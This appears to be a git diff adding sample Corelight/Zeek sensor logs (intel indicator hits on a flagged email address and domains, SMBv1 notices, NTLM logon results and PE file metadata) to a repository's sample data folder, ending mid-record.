+{"ts":"2018-08-03T23:38:05.553794Z","uid":"CaOpm4JpVQx9WPa7d","id.orig_h":"192.168.0.51","id.orig_p":60390,"id.resp_h":"81.236.55.3","id.resp_p":25,"seen.indicator":"homer.pwned.se@gmx.com","seen.indicator_type":"Intel::EMAIL","seen.where":"SMTP::IN_FROM","matched":["Intel::EMAIL"],"sources":["Corelight MISP (5b1f252a-8d38-4a6e-8bcb-06a10a0ac7c9) - Corelight"]} +{"ts":"2018-08-03T23:38:05.553794Z","uid":"CaOpm4JpVQx9WPa7d","id.orig_h":"192.168.0.51","id.orig_p":60390,"id.resp_h":"81.236.55.3","id.resp_p":25,"seen.indicator":"homer.pwned.se@gmx.com","seen.indicator_type":"Intel::EMAIL","seen.where":"SMTP::IN_MAIL_FROM","matched":["Intel::EMAIL"],"sources":["Corelight MISP (5b1f252a-8d38-4a6e-8bcb-06a10a0ac7c9) - Corelight"]} +{"ts":"2018-08-03T23:38:05.553794Z","uid":"CaOpm4JpVQx9WPa7d","id.orig_h":"192.168.0.51","id.orig_p":60390,"id.resp_h":"81.236.55.3","id.resp_p":25,"seen.indicator":"homer.pwned.se@gmx.com","seen.indicator_type":"Intel::EMAIL","seen.where":"SMTP::IN_FROM","matched":["Intel::EMAIL"],"sources":["Corelight MISP (5b1f252a-8d38-4a6e-8bcb-06a10a0ac7c9) - Corelight"]} +{"ts":"2018-08-03T23:38:05.553794Z","uid":"CaOpm4JpVQx9WPa7d","id.orig_h":"192.168.0.51","id.orig_p":60390,"id.resp_h":"81.236.55.3","id.resp_p":25,"seen.indicator":"homer.pwned.se@gmx.com","seen.indicator_type":"Intel::EMAIL","seen.where":"SMTP::IN_MAIL_FROM","matched":["Intel::EMAIL"],"sources":["Corelight MISP (5b1f252a-8d38-4a6e-8bcb-06a10a0ac7c9) - Corelight"]} +{"ts":"2018-08-03T23:38:05.553794Z","uid":"CaOpm4JpVQx9WPa7d","id.orig_h":"192.168.0.51","id.orig_p":60390,"id.resp_h":"81.236.55.3","id.resp_p":25,"seen.indicator":"homer.pwned.se@gmx.com","seen.indicator_type":"Intel::EMAIL","seen.where":"SMTP::IN_FROM","matched":["Intel::EMAIL"],"sources":["Corelight MISP (5b1f252a-8d38-4a6e-8bcb-06a10a0ac7c9) - Corelight"]} +{"ts":"2018-08-03T23:38:05.579829Z","uid":"Cka4Bv1qmbA1RTFF53","id.orig_h":"192.168.0.53","id.orig_p":1289,"id.resp_h":"81.236.55.3","id.resp_p":25,"seen.indicator":"homer.pwned.se@gmx.com","seen.indicator_type":"Intel::EMAIL","seen.where":"SMTP::IN_RCPT_TO","matched":["Intel::EMAIL"],"sources":["Corelight MISP (5b1f252a-8d38-4a6e-8bcb-06a10a0ac7c9) - Corelight"]} +{"ts":"2018-08-03T23:38:05.579829Z","uid":"Cka4Bv1qmbA1RTFF53","id.orig_h":"192.168.0.53","id.orig_p":1289,"id.resp_h":"81.236.55.3","id.resp_p":25,"seen.indicator":"homer.pwned.se@gmx.com","seen.indicator_type":"Intel::EMAIL","seen.where":"SMTP::IN_TO","matched":["Intel::EMAIL"],"sources":["Corelight MISP (5b1f252a-8d38-4a6e-8bcb-06a10a0ac7c9) - Corelight"]} +{"ts":"2018-08-03T23:38:05.579829Z","uid":"Cka4Bv1qmbA1RTFF53","id.orig_h":"192.168.0.53","id.orig_p":1289,"id.resp_h":"81.236.55.3","id.resp_p":25,"seen.indicator":"homer.pwned.se@gmx.com","seen.indicator_type":"Intel::EMAIL","seen.where":"SMTP::IN_RCPT_TO","matched":["Intel::EMAIL"],"sources":["Corelight MISP (5b1f252a-8d38-4a6e-8bcb-06a10a0ac7c9) - Corelight"]} +{"ts":"2018-08-03T23:38:05.579829Z","uid":"Cka4Bv1qmbA1RTFF53","id.orig_h":"192.168.0.53","id.orig_p":1289,"id.resp_h":"81.236.55.3","id.resp_p":25,"seen.indicator":"homer.pwned.se@gmx.com","seen.indicator_type":"Intel::EMAIL","seen.where":"SMTP::IN_TO","matched":["Intel::EMAIL"],"sources":["Corelight MISP (5b1f252a-8d38-4a6e-8bcb-06a10a0ac7c9) - Corelight"]} +{"ts":"2018-08-03T23:38:07.644815Z","uid":"C6o9LOw6TqD2qMLEc","id.orig_h":"192.168.0.53","id.orig_p":1322,"id.resp_h":"81.236.55.3","id.resp_p":25,"seen.indicator":"homer.pwned.se@gmx.com","seen.indicator_type":"Intel::EMAIL","seen.where":"SMTP::IN_RCPT_TO","matched":["Intel::EMAIL"],"sources":["Corelight MISP (5b1f252a-8d38-4a6e-8bcb-06a10a0ac7c9) - Corelight"]} +{"ts":"2018-08-03T23:38:07.644815Z","uid":"C6o9LOw6TqD2qMLEc","id.orig_h":"192.168.0.53","id.orig_p":1322,"id.resp_h":"81.236.55.3","id.resp_p":25,"seen.indicator":"homer.pwned.se@gmx.com","seen.indicator_type":"Intel::EMAIL","seen.where":"SMTP::IN_RCPT_TO","matched":["Intel::EMAIL"],"sources":["Corelight MISP (5b1f252a-8d38-4a6e-8bcb-06a10a0ac7c9) - Corelight"]} +{"ts":"2018-08-03T23:38:07.684601Z","uid":"C6o9LOw6TqD2qMLEc","id.orig_h":"192.168.0.53","id.orig_p":1322,"id.resp_h":"81.236.55.3","id.resp_p":25,"seen.indicator":"homer.pwned.se@gmx.com","seen.indicator_type":"Intel::EMAIL","seen.where":"SMTP::IN_RCPT_TO","matched":["Intel::EMAIL"],"sources":["Corelight MISP (5b1f252a-8d38-4a6e-8bcb-06a10a0ac7c9) - Corelight"]} +{"ts":"2018-08-03T23:38:12.377739Z","uid":"C5yXAv453aG4WkzlBj","id.orig_h":"192.168.0.53","id.orig_p":1283,"id.resp_h":"81.236.55.3","id.resp_p":25,"seen.indicator":"homer.pwned.se@gmx.com","seen.indicator_type":"Intel::EMAIL","seen.where":"SMTP::IN_RCPT_TO","matched":["Intel::EMAIL"],"sources":["Corelight MISP (5b1f252a-8d38-4a6e-8bcb-06a10a0ac7c9) - Corelight"]} +{"ts":"2018-08-03T23:38:12.377739Z","uid":"C5yXAv453aG4WkzlBj","id.orig_h":"192.168.0.53","id.orig_p":1283,"id.resp_h":"81.236.55.3","id.resp_p":25,"seen.indicator":"homer.pwned.se@gmx.com","seen.indicator_type":"Intel::EMAIL","seen.where":"SMTP::IN_TO","matched":["Intel::EMAIL"],"sources":["Corelight MISP (5b1f252a-8d38-4a6e-8bcb-06a10a0ac7c9) - Corelight"]} +{"ts":"2018-08-03T23:38:12.377739Z","uid":"C5yXAv453aG4WkzlBj","id.orig_h":"192.168.0.53","id.orig_p":1283,"id.resp_h":"81.236.55.3","id.resp_p":25,"seen.indicator":"homer.pwned.se@gmx.com","seen.indicator_type":"Intel::EMAIL","seen.where":"SMTP::IN_RCPT_TO","matched":["Intel::EMAIL"],"sources":["Corelight MISP (5b1f252a-8d38-4a6e-8bcb-06a10a0ac7c9) - Corelight"]} +{"ts":"2018-08-03T23:38:12.377739Z","uid":"C5yXAv453aG4WkzlBj","id.orig_h":"192.168.0.53","id.orig_p":1283,"id.resp_h":"81.236.55.3","id.resp_p":25,"seen.indicator":"homer.pwned.se@gmx.com","seen.indicator_type":"Intel::EMAIL","seen.where":"SMTP::IN_TO","matched":["Intel::EMAIL"],"sources":["Corelight MISP (5b1f252a-8d38-4a6e-8bcb-06a10a0ac7c9) - Corelight"]} +{"ts":"2018-08-03T23:38:12.377739Z","uid":"C5yXAv453aG4WkzlBj","id.orig_h":"192.168.0.53","id.orig_p":1283,"id.resp_h":"81.236.55.3","id.resp_p":25,"seen.indicator":"homer.pwned.se@gmx.com","seen.indicator_type":"Intel::EMAIL","seen.where":"SMTP::IN_RCPT_TO","matched":["Intel::EMAIL"],"sources":["Corelight MISP (5b1f252a-8d38-4a6e-8bcb-06a10a0ac7c9) - Corelight"]} +{"ts":"2018-08-03T23:38:12.377739Z","uid":"C5yXAv453aG4WkzlBj","id.orig_h":"192.168.0.53","id.orig_p":1283,"id.resp_h":"81.236.55.3","id.resp_p":25,"seen.indicator":"homer.pwned.se@gmx.com","seen.indicator_type":"Intel::EMAIL","seen.where":"SMTP::IN_TO","matched":["Intel::EMAIL"],"sources":["Corelight MISP (5b1f252a-8d38-4a6e-8bcb-06a10a0ac7c9) - Corelight"]} +{"ts":"2018-08-03T23:38:48.925701Z","uid":"CTdvGJ2M1oDwIJ9nKc","id.orig_h":"192.168.0.53","id.orig_p":1244,"id.resp_h":"192.168.0.1","id.resp_p":53,"seen.indicator":"www.mybusinessdoc.com","seen.indicator_type":"Intel::DOMAIN","seen.where":"DNS::IN_REQUEST","matched":["Intel::DOMAIN"],"sources":["Corelight MISP (5b1f252a-8d38-4a6e-8bcb-06a10a0ac7c9) - Corelight"]} +{"ts":"2018-08-03T23:38:48.925701Z","uid":"CIqv2yvdg50rJT9Mk","id.orig_h":"192.168.0.53","id.orig_p":2210,"id.resp_h":"5.254.127.11","id.resp_p":80,"seen.indicator":"www.mybusinessdoc.com","seen.indicator_type":"Intel::DOMAIN","seen.where":"HTTP::IN_HOST_HEADER","matched":["Intel::DOMAIN"],"sources":["Corelight MISP (5b1f252a-8d38-4a6e-8bcb-06a10a0ac7c9) - Corelight"]} +{"ts":"2018-08-03T23:38:48.925701Z","uid":"CeEwr7suNmvvJmp14","id.orig_h":"192.168.0.53","id.orig_p":2211,"id.resp_h":"216.47.227.188","id.resp_p":80,"seen.indicator":"216.47.227.188","seen.indicator_type":"Intel::ADDR","seen.where":"Conn::IN_RESP","matched":["Intel::ADDR"],"sources":["Corelight MISP (5b1f252a-8d38-4a6e-8bcb-06a10a0ac7c9) - Corelight"]} +{"ts":"2018-08-03T23:38:48.925701Z","uid":"CTdvGJ2M1oDwIJ9nKc","id.orig_h":"192.168.0.53","id.orig_p":1244,"id.resp_h":"192.168.0.1","id.resp_p":53,"seen.indicator":"carina-paris-hotel.com","seen.indicator_type":"Intel::DOMAIN","seen.where":"DNS::IN_REQUEST","matched":["Intel::DOMAIN"],"sources":["Corelight MISP (5b1f252a-8d38-4a6e-8bcb-06a10a0ac7c9) - Corelight"]} +{"ts":"2018-08-03T23:38:48.925701Z","uid":"CIqv2yvdg50rJT9Mk","id.orig_h":"192.168.0.53","id.orig_p":2210,"id.resp_h":"5.254.127.11","id.resp_p":80,"seen.indicator":"www.mybusinessdoc.com","seen.indicator_type":"Intel::DOMAIN","seen.where":"HTTP::IN_HOST_HEADER","matched":["Intel::DOMAIN"],"sources":["Corelight MISP (5b1f252a-8d38-4a6e-8bcb-06a10a0ac7c9) - Corelight"]} +{"ts":"2018-08-03T23:38:48.925701Z","uid":"CIqv2yvdg50rJT9Mk","id.orig_h":"192.168.0.53","id.orig_p":2210,"id.resp_h":"5.254.127.11","id.resp_p":80,"seen.indicator":"www.mybusinessdoc.com","seen.indicator_type":"Intel::DOMAIN","seen.where":"HTTP::IN_HOST_HEADER","matched":["Intel::DOMAIN"],"sources":["Corelight MISP (5b1f252a-8d38-4a6e-8bcb-06a10a0ac7c9) - Corelight"]} +{"ts":"2018-08-03T23:38:48.925701Z","uid":"CpvOV23eT05qD73gl4","id.orig_h":"192.168.0.53","id.orig_p":2212,"id.resp_h":"209.59.156.160","id.resp_p":80,"seen.indicator":"carina-paris-hotel.com","seen.indicator_type":"Intel::DOMAIN","seen.where":"HTTP::IN_HOST_HEADER","matched":["Intel::DOMAIN"],"sources":["Corelight MISP (5b1f252a-8d38-4a6e-8bcb-06a10a0ac7c9) - Corelight"]} +{"ts":"2018-08-03T23:38:48.925701Z","uid":"CEH0pi3rUh8dJO0Agj","id.orig_h":"192.168.0.53","id.orig_p":2370,"id.resp_h":"81.236.55.3","id.resp_p":25,"seen.indicator":"homer.pwned.se@gmx.com","seen.indicator_type":"Intel::EMAIL","seen.where":"SMTP::IN_RCPT_TO","matched":["Intel::EMAIL"],"sources":["Corelight MISP (5b1f252a-8d38-4a6e-8bcb-06a10a0ac7c9) - Corelight"]} +{"ts":"2018-08-03T23:38:48.925701Z","uid":"CEH0pi3rUh8dJO0Agj","id.orig_h":"192.168.0.53","id.orig_p":2370,"id.resp_h":"81.236.55.3","id.resp_p":25,"seen.indicator":"homer.pwned.se@gmx.com","seen.indicator_type":"Intel::EMAIL","seen.where":"SMTP::IN_TO","matched":["Intel::EMAIL"],"sources":["Corelight MISP (5b1f252a-8d38-4a6e-8bcb-06a10a0ac7c9) - Corelight"]} +{"ts":"2018-08-03T23:38:48.925701Z","uid":"CEH0pi3rUh8dJO0Agj","id.orig_h":"192.168.0.53","id.orig_p":2370,"id.resp_h":"81.236.55.3","id.resp_p":25,"seen.indicator":"homer.pwned.se@gmx.com","seen.indicator_type":"Intel::EMAIL","seen.where":"SMTP::IN_RCPT_TO","matched":["Intel::EMAIL"],"sources":["Corelight MISP (5b1f252a-8d38-4a6e-8bcb-06a10a0ac7c9) - Corelight"]} +{"ts":"2018-08-03T23:38:48.925701Z","uid":"CEH0pi3rUh8dJO0Agj","id.orig_h":"192.168.0.53","id.orig_p":2370,"id.resp_h":"81.236.55.3","id.resp_p":25,"seen.indicator":"homer.pwned.se@gmx.com","seen.indicator_type":"Intel::EMAIL","seen.where":"SMTP::IN_TO","matched":["Intel::EMAIL"],"sources":["Corelight MISP (5b1f252a-8d38-4a6e-8bcb-06a10a0ac7c9) - Corelight"]} +{"ts":"2018-08-03T23:38:48.925701Z","uid":"CEH0pi3rUh8dJO0Agj","id.orig_h":"192.168.0.53","id.orig_p":2370,"id.resp_h":"81.236.55.3","id.resp_p":25,"seen.indicator":"homer.pwned.se@gmx.com","seen.indicator_type":"Intel::EMAIL","seen.where":"SMTP::IN_RCPT_TO","matched":["Intel::EMAIL"],"sources":["Corelight MISP (5b1f252a-8d38-4a6e-8bcb-06a10a0ac7c9) - Corelight"]} +{"ts":"2018-08-03T23:38:48.925701Z","uid":"CEH0pi3rUh8dJO0Agj","id.orig_h":"192.168.0.53","id.orig_p":2370,"id.resp_h":"81.236.55.3","id.resp_p":25,"seen.indicator":"homer.pwned.se@gmx.com","seen.indicator_type":"Intel::EMAIL","seen.where":"SMTP::IN_TO","matched":["Intel::EMAIL"],"sources":["Corelight MISP (5b1f252a-8d38-4a6e-8bcb-06a10a0ac7c9) - Corelight"]} diff --git a/Sample Data/Custom/Corelight/notice_20180803_16:37:37-16:40:00-0700.log_ b/Sample Data/Custom/Corelight/notice_20180803_16:37:37-16:40:00-0700.log_ new file mode 100644 index 0000000000..e90462ab49 --- /dev/null +++ b/Sample Data/Custom/Corelight/notice_20180803_16:37:37-16:40:00-0700.log_ @@ -0,0 +1,12 @@ +{"ts":"2018-08-03T23:37:37.179658Z","uid":"CG5t5oYIO7O45XIxa","id.orig_h":"192.168.0.53","id.orig_p":1732,"id.resp_h":"81.236.55.3","id.resp_p":25,"proto":"tcp","note":"Intel::Notice","msg":"Intel hit on homer.pwned.se@gmx.com at SMTP::IN_RCPT_TO","sub":"homer.pwned.se@gmx.com","src":"192.168.0.53","dst":"81.236.55.3","p":25,"peer_descr":"bro","actions":["Notice::ACTION_LOG"],"suppress_for":3600.0,"dropped":false} +{"ts":"2018-08-03T23:37:37.179658Z","uid":"ClQLJSY46P9GMuHL3","id.orig_h":"192.168.0.51","id.orig_p":35760,"id.resp_h":"81.236.55.3","id.resp_p":25,"proto":"tcp","note":"Intel::Notice","msg":"Intel hit on homer.pwned.se@gmx.com at SMTP::IN_MAIL_FROM","sub":"homer.pwned.se@gmx.com","src":"192.168.0.51","dst":"81.236.55.3","p":25,"peer_descr":"bro","actions":["Notice::ACTION_LOG"],"suppress_for":3600.0,"dropped":false} +{"ts":"2018-08-03T23:38:48.925701Z","uid":"CTdvGJ2M1oDwIJ9nKc","id.orig_h":"192.168.0.53","id.orig_p":1244,"id.resp_h":"192.168.0.1","id.resp_p":53,"proto":"udp","note":"Intel::Notice","msg":"Intel hit on www.mybusinessdoc.com at DNS::IN_REQUEST","sub":"www.mybusinessdoc.com","src":"192.168.0.53","dst":"192.168.0.1","p":53,"peer_descr":"bro","actions":["Notice::ACTION_LOG"],"suppress_for":3600.0,"dropped":false} +{"ts":"2018-08-03T23:38:48.925701Z","uid":"CIqv2yvdg50rJT9Mk","id.orig_h":"192.168.0.53","id.orig_p":2210,"id.resp_h":"5.254.127.11","id.resp_p":80,"proto":"tcp","note":"Intel::Notice","msg":"Intel hit on www.mybusinessdoc.com at HTTP::IN_HOST_HEADER","sub":"www.mybusinessdoc.com","src":"192.168.0.53","dst":"5.254.127.11","p":80,"peer_descr":"bro","actions":["Notice::ACTION_LOG"],"suppress_for":3600.0,"dropped":false} +{"ts":"2018-08-03T23:38:48.925701Z","uid":"CeEwr7suNmvvJmp14","id.orig_h":"192.168.0.53","id.orig_p":2211,"id.resp_h":"216.47.227.188","id.resp_p":80,"proto":"tcp","note":"Intel::Notice","msg":"Intel hit on 216.47.227.188 at Conn::IN_RESP","sub":"216.47.227.188","src":"192.168.0.53","dst":"216.47.227.188","p":80,"peer_descr":"bro","actions":["Notice::ACTION_LOG"],"suppress_for":3600.0,"dropped":false} +{"ts":"2018-08-03T23:38:48.925701Z","uid":"CTdvGJ2M1oDwIJ9nKc","id.orig_h":"192.168.0.53","id.orig_p":1244,"id.resp_h":"192.168.0.1","id.resp_p":53,"proto":"udp","note":"Intel::Notice","msg":"Intel hit on carina-paris-hotel.com at DNS::IN_REQUEST","sub":"carina-paris-hotel.com","src":"192.168.0.53","dst":"192.168.0.1","p":53,"peer_descr":"bro","actions":["Notice::ACTION_LOG"],"suppress_for":3600.0,"dropped":false} +{"ts":"2018-08-03T23:38:48.925701Z","uid":"CpvOV23eT05qD73gl4","id.orig_h":"192.168.0.53","id.orig_p":2212,"id.resp_h":"209.59.156.160","id.resp_p":80,"proto":"tcp","note":"Intel::Notice","msg":"Intel hit on carina-paris-hotel.com at HTTP::IN_HOST_HEADER","sub":"carina-paris-hotel.com","src":"192.168.0.53","dst":"209.59.156.160","p":80,"peer_descr":"bro","actions":["Notice::ACTION_LOG"],"suppress_for":3600.0,"dropped":false} +{"ts":"2018-08-03T23:39:01.314346Z","uid":"C2P6jt32gESqlJqb32","id.orig_h":"125.5.61.130","id.orig_p":4577,"id.resp_h":"10.0.0.11","id.resp_p":445,"proto":"tcp","note":"FindSMBv1::Seen","msg":"SMBv1 Connection 125.5.61.130 to 10.0.0.11","src":"125.5.61.130","dst":"10.0.0.11","p":445,"peer_descr":"bro","actions":["Notice::ACTION_LOG"],"suppress_for":3600.0,"dropped":false} +{"ts":"2018-08-03T23:39:01.314346Z","uid":"CJ2I2X3eumh4KByV81","id.orig_h":"202.177.98.46","id.orig_p":8530,"id.resp_h":"10.0.0.11","id.resp_p":445,"proto":"tcp","note":"FindSMBv1::Seen","msg":"SMBv1 Connection 202.177.98.46 to 10.0.0.11","src":"202.177.98.46","dst":"10.0.0.11","p":445,"peer_descr":"bro","actions":["Notice::ACTION_LOG"],"suppress_for":3600.0,"dropped":false} +{"ts":"2018-08-03T23:39:01.314346Z","uid":"CbOpF7444p309keZB9","id.orig_h":"81.213.174.63","id.orig_p":54313,"id.resp_h":"10.0.0.11","id.resp_p":445,"proto":"tcp","note":"FindSMBv1::Seen","msg":"SMBv1 Connection 81.213.174.63 to 10.0.0.11","src":"81.213.174.63","dst":"10.0.0.11","p":445,"peer_descr":"bro","actions":["Notice::ACTION_LOG"],"suppress_for":3600.0,"dropped":false} +{"ts":"2018-08-03T23:39:01.314346Z","uid":"C4cMdr30cSbBpKtxH4","id.orig_h":"85.132.46.226","id.orig_p":62248,"id.resp_h":"10.0.0.11","id.resp_p":445,"proto":"tcp","note":"FindSMBv1::Seen","msg":"SMBv1 Connection 85.132.46.226 to 10.0.0.11","src":"85.132.46.226","dst":"10.0.0.11","p":445,"peer_descr":"bro","actions":["Notice::ACTION_LOG"],"suppress_for":3600.0,"dropped":false} +{"ts":"2018-08-03T23:39:02.808643Z","uid":"CPjVQz26XMOipsHhZj","id.orig_h":"172.16.1.8","id.orig_p":38886,"id.resp_h":"172.16.1.7","id.resp_p":445,"proto":"tcp","note":"FindSMBv1::Seen","msg":"SMBv1 Connection 172.16.1.8 to 172.16.1.7","src":"172.16.1.8","dst":"172.16.1.7","p":445,"peer_descr":"bro","actions":["Notice::ACTION_LOG"],"suppress_for":3600.0,"dropped":false} diff --git a/Sample Data/Custom/Corelight/ntlm_20180803_16:39:01-16:40:00-0700.log_ b/Sample Data/Custom/Corelight/ntlm_20180803_16:39:01-16:40:00-0700.log_ new file mode 100644 index 0000000000..a9e652e41a --- /dev/null +++ b/Sample Data/Custom/Corelight/ntlm_20180803_16:39:01-16:40:00-0700.log_ @@ -0,0 +1,11 @@ +{"ts":"2018-08-03T23:39:01.304269Z","uid":"CJ2I2X3eumh4KByV81","id.orig_h":"202.177.98.46","id.orig_p":8530,"id.resp_h":"10.0.0.11","id.resp_p":445,"hostname":"lQPxf2ISQgEV1bGK","domainname":"WORKGROUP","success":true,"status":"SUCCESS"} +{"ts":"2018-08-03T23:39:01.307124Z","uid":"C2P6jt32gESqlJqb32","id.orig_h":"125.5.61.130","id.orig_p":4577,"id.resp_h":"10.0.0.11","id.resp_p":445,"hostname":"lQPxf2ISQgEV1bGK","domainname":"WORKGROUP","success":true,"status":"SUCCESS"} +{"ts":"2018-08-03T23:39:01.310882Z","uid":"CbOpF7444p309keZB9","id.orig_h":"81.213.174.63","id.orig_p":54313,"id.resp_h":"10.0.0.11","id.resp_p":445,"hostname":"lQPxf2ISQgEV1bGK","domainname":"WORKGROUP","success":true,"status":"SUCCESS"} +{"ts":"2018-08-03T23:39:01.310882Z","uid":"C4cMdr30cSbBpKtxH4","id.orig_h":"85.132.46.226","id.orig_p":62248,"id.resp_h":"10.0.0.11","id.resp_p":445,"hostname":"lQPxf2ISQgEV1bGK","domainname":"WORKGROUP","success":true,"status":"SUCCESS"} +{"ts":"2018-08-03T23:39:02.808953Z","uid":"Co7dkb3VZW4JUWlYV5","id.orig_h":"172.16.1.8","id.orig_p":38891,"id.resp_h":"172.16.1.7","id.resp_p":445,"username":"sonos","hostname":"INTENSE","domainname":"WORKGROUP","success":false,"status":"LOGON_FAILURE"} +{"ts":"2018-08-03T23:39:02.812722Z","uid":"COGaRD3cM7jP2XFdy8","id.orig_h":"172.16.1.8","id.orig_p":38896,"id.resp_h":"172.16.1.7","id.resp_p":445,"username":"sonos","hostname":"INTENSE","domainname":"WORKGROUP","success":true,"status":"SUCCESS"} +{"ts":"2018-08-03T23:39:02.808982Z","uid":"C21en73FMP4ek9D6V7","id.orig_h":"172.16.1.8","id.orig_p":38894,"id.resp_h":"172.16.1.7","id.resp_p":445,"username":"sonos","hostname":"INTENSE","domainname":"WORKGROUP","success":false,"status":"LOGON_FAILURE"} +{"ts":"2018-08-03T23:39:02.806384Z","uid":"CEYfiD3mbXWS12t6c1","id.orig_h":"172.16.1.8","id.orig_p":38889,"id.resp_h":"172.16.1.7","id.resp_p":445,"username":"sonos","hostname":"INTENSE","domainname":"WORKGROUP","success":true,"status":"SUCCESS"} +{"ts":"2018-08-03T23:39:02.808066Z","uid":"C2QZER6w0F3Z8qPpa","id.orig_h":"172.16.1.8","id.orig_p":38888,"id.resp_h":"172.16.1.7","id.resp_p":445,"username":"sonos","hostname":"INTENSE","domainname":"WORKGROUP","success":true,"status":"SUCCESS"} +{"ts":"2018-08-03T23:39:02.805909Z","uid":"CPjVQz26XMOipsHhZj","id.orig_h":"172.16.1.8","id.orig_p":38886,"id.resp_h":"172.16.1.7","id.resp_p":445,"username":"sonos","hostname":"INTENSE","domainname":"WORKGROUP","success":true,"status":"SUCCESS"} +{"ts":"2018-08-03T23:39:02.810316Z","uid":"CtXGTtnwGhwiZGX4c","id.orig_h":"172.16.1.8","id.orig_p":38895,"id.resp_h":"172.16.1.7","id.resp_p":445,"username":"sonos","hostname":"INTENSE","domainname":"WORKGROUP","success":true,"status":"SUCCESS"} diff --git a/Sample Data/Custom/Corelight/pe_20180803_16:37:18-16:40:00-0700.log_ b/Sample Data/Custom/Corelight/pe_20180803_16:37:18-16:40:00-0700.log_ new file mode 100644 index 0000000000..7e21a31041 --- /dev/null +++ b/Sample Data/Custom/Corelight/pe_20180803_16:37:18-16:40:00-0700.log_ @@ -0,0 +1,50 @@ +{"ts":"2018-08-03T23:37:18.352779Z","id":"FqWgw53sSrY7GT6G11","machine":"I386","compile_ts":"2012-02-17T14:55:26.000000Z","os":"Windows 2000","subsystem":"WINDOWS_GUI","is_exe":true,"is_64bit":false,"uses_aslr":false,"uses_dep":true,"uses_code_integrity":false,"uses_seh":false,"has_import_table":true,"has_export_table":true,"has_cert_table":true,"has_debug_data":true,"section_names":[".text",".rdata",".data",".CRT",".rsrc"]} +{"ts":"2018-08-03T23:37:19.498760Z","id":"FSAYtT3Ou3jUUiYE66","machine":"I386","compile_ts":"1992-06-19T22:22:17.000000Z","os":"Windows 1.0","subsystem":"WINDOWS_GUI","is_exe":true,"is_64bit":false,"uses_aslr":false,"uses_dep":false,"uses_code_integrity":false,"uses_seh":true,"has_import_table":true,"has_export_table":false,"has_cert_table":true,"has_debug_data":false,"section_names":["CODE","DATA","BSS",".idata",".tls",".rdata",".reloc",".rsrc"]} +{"ts":"2018-08-03T23:37:22.439510Z","id":"F6uxPRPjynWNXMZnb","machine":"I386","compile_ts":"2006-08-28T20:23:46.000000Z","os":"Windows XP x64 or Server 2003","subsystem":"WINDOWS_GUI","is_exe":true,"is_64bit":false,"uses_aslr":false,"uses_dep":false,"uses_code_integrity":false,"uses_seh":true,"has_import_table":true,"has_export_table":false,"has_cert_table":true,"has_debug_data":true,"section_names":[".text",".data",".rsrc"]} +{"ts":"2018-08-03T23:37:22.449598Z","id":"FpUFj52tDZLxsjg978","machine":"I386","compile_ts":"2005-02-24T19:44:38.000000Z","os":"Windows XP x64 or Server 2003","subsystem":"WINDOWS_GUI","is_exe":true,"is_64bit":false,"uses_aslr":false,"uses_dep":false,"uses_code_integrity":false,"uses_seh":false,"has_import_table":true,"has_export_table":false,"has_cert_table":true,"has_debug_data":true,"section_names":[".text",".data",".rsrc"]} +{"ts":"2018-08-03T23:37:23.089084Z","id":"F3ngMC3BVzjmCqyTRi","machine":"I386","compile_ts":"2012-02-24T19:20:04.000000Z","os":"Windows 2000","subsystem":"WINDOWS_GUI","is_exe":true,"is_64bit":false,"uses_aslr":true,"uses_dep":true,"uses_code_integrity":false,"uses_seh":false,"has_import_table":true,"has_export_table":false,"has_cert_table":true,"has_debug_data":false,"section_names":[".text",".rdata",".data",".ndata",".rsrc",".reloc"]} +{"ts":"2018-08-03T23:37:22.750637Z","id":"FRxEQg4qUXhEpVz7g6","machine":"I386","compile_ts":"2007-12-21T07:26:24.000000Z","os":"Windows XP x64 or Server 2003","subsystem":"WINDOWS_GUI","is_exe":true,"is_64bit":false,"uses_aslr":false,"uses_dep":false,"uses_code_integrity":false,"uses_seh":true,"has_import_table":true,"has_export_table":false,"has_cert_table":true,"has_debug_data":true,"section_names":[".text",".data",".rsrc"]} +{"ts":"2018-08-03T23:37:23.318110Z","id":"F2Q9YS3TcZLeUXTN3c","machine":"I386","compile_ts":"2015-02-28T02:01:00.000000Z","os":"Windows 95 or NT 4.0","subsystem":"WINDOWS_GUI","is_exe":true,"is_64bit":false,"uses_aslr":false,"uses_dep":true,"uses_code_integrity":false,"uses_seh":true,"has_import_table":true,"has_export_table":false,"has_cert_table":true,"has_debug_data":true,"section_names":[".text",".data",".rsrc"]} +{"ts":"2018-08-03T23:37:26.959067Z","id":"Fa43UsRbgTr34n0C2","machine":"AMD64","compile_ts":"2011-06-25T04:50:32.000000Z","os":"Windows 7 or Server 2008 R2","subsystem":"WINDOWS_GUI","is_exe":true,"is_64bit":true,"uses_aslr":true,"uses_dep":true,"uses_code_integrity":false,"uses_seh":true,"has_import_table":true,"has_export_table":true,"has_cert_table":true,"has_debug_data":true,"section_names":[".text",".data",".pdata",".rsrc",".reloc"]} +{"ts":"2018-08-03T23:37:27.424413Z","id":"FT05zn1jX5vEAcVVj2","machine":"AMD64","compile_ts":"2011-06-25T04:50:32.000000Z","os":"Windows 7 or Server 2008 R2","subsystem":"WINDOWS_GUI","is_exe":true,"is_64bit":true,"uses_aslr":true,"uses_dep":true,"uses_code_integrity":false,"uses_seh":true,"has_import_table":true,"has_export_table":true,"has_cert_table":true,"has_debug_data":true,"section_names":[".text",".data",".pdata",".rsrc",".reloc"]} +{"ts":"2018-08-03T23:37:28.248937Z","id":"Fsq9Az9mYrrwlkrc","machine":"I386","compile_ts":"2013-12-26T00:13:26.000000Z","os":"Windows XP","subsystem":"WINDOWS_GUI","is_exe":true,"is_64bit":false,"uses_aslr":true,"uses_dep":true,"uses_code_integrity":false,"uses_seh":true,"has_import_table":true,"has_export_table":true,"has_cert_table":true,"has_debug_data":true,"section_names":[".text",".data",".idata",".boxld01",".rsrc",".reloc"]} +{"ts":"2018-08-03T23:37:28.542609Z","id":"FkNjbc1UcBxzbqlNs1","machine":"I386","compile_ts":"2007-12-21T07:26:24.000000Z","os":"Windows XP x64 or Server 2003","subsystem":"WINDOWS_GUI","is_exe":true,"is_64bit":false,"uses_aslr":false,"uses_dep":false,"uses_code_integrity":false,"uses_seh":true,"has_import_table":true,"has_export_table":false,"has_cert_table":true,"has_debug_data":true,"section_names":[".text",".data",".rsrc"]} +{"ts":"2018-08-03T23:37:32.590477Z","id":"FFaBPd4sEeE1UQSy0a","machine":"I386","compile_ts":"2013-12-26T00:13:26.000000Z","os":"Windows 